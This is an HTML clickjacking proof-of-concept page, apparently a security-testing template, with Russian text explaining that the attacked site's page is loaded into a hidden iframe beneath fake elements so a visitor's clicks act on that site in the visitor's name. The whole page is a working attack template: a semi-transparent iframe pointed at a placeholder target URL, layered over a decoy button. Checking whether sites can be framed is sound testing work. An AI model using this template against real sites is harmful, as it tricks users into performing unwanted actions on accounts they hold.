<!DOCTYPE html>
<html>
<head>
    <title>Clickjacking Fast PoC</title>
    <meta charset="UTF-8">
    <style>
        #target_website {
            position:absolute;
            width:715px;
            height:715px;
            opacity:0.4;
            z-index:2;
            left: 50px;
            transform: scale(0.7);
            transform-origin: top left;
        }
        #fake_website {
            position:absolute;
            width:600px;
            height:400px;
            opacity:0.7;
            z-index:1;
            color: black;
            font-family: Verdana, sans-serif;
            background-color: red;
            font-size: 30px;
            top: 50px;
        }
        div {
            width:600px;
            text-align: justify;
            font-family: Verdana, sans-serif;
            font-size: 12px
            }
        code {
            color: crimson;
            background-color: #f1f1f1;
            padding: 2px;
            font-size: 12px
        }
    </style>
</head>
<body>
    <div style="position:relative;">
        <h1>Clickjacking Fast PoC</h1>
        <p>
            Уязвимая страница атакуемого сайта загружается на ресурсе злоумышленника в теге <code>iframe</code> и делается невидимой для пользователя. Вместо нее на странице отображаются поддельные элементы, повторяющие расположение элементов атакуемого сайта.
        </p>
        <p>
            Таким образом, посетитель ресурса злоумышленника при попытке взаимодействии с его элементами в действительности будет взаимодействовать с атакуемым ресурсом, что может привести к выполнению вредоносных действий на атакуемом сайте от имени пользователя.
        </p>
    </div>
    <div style="position:relative;">
        <button id="fake_website">FAKE ELEMENTS</button>
        <iframe id="target_website" src="__TARGET_URL__" scrolling="no"></iframe>
    </div>
</body>
</html>